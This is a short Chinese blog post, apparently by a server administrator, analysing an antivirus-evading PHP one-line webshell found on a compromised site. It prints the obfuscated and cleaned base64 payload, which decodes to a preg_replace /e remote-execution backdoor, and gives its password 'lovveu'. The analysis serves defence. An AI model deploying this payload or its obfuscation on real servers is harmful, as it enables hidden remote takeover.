关于免杀一句话木马的解密还原

一次巡查服务器的时候，发现网站存在漏洞，并已被植入后门。因为服务器有安全狗，由此断定后门代码是免杀的。

首先我们看看加密的源码

 其中加色部分$drx.$ydd.$hq.$qvz按照排列依次拼接

“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgo

Ii9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK”这样的一串不规则的乱码。

现在的程序就变成了这样

就算不懂PHP源代码都能看出

$rc = str_replace("v","","svtvr_rveplvavce")；"svtvr_rveplvavce"中去掉“v”刚好就是“str_replace”

那么下面这段加密内容也同样要去掉多余“gc”

“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgoI

i9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK”

得到一下base64_decode真实的加密内容

“CiRoaCA9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIi4icCIuImwiLiJhIi4iYyIuImUiOwokaGgoIi9bZGlzY3V

6XS9lIiwkX1BPU1RbJ2xvdnZldSddLCJBY2Nlc3MiKTsK"

我们在通过base64_decode解密刚才获取的内容看看

那么真实的密码就暴露了"lovveu"

在上WEB测试密码确实正确。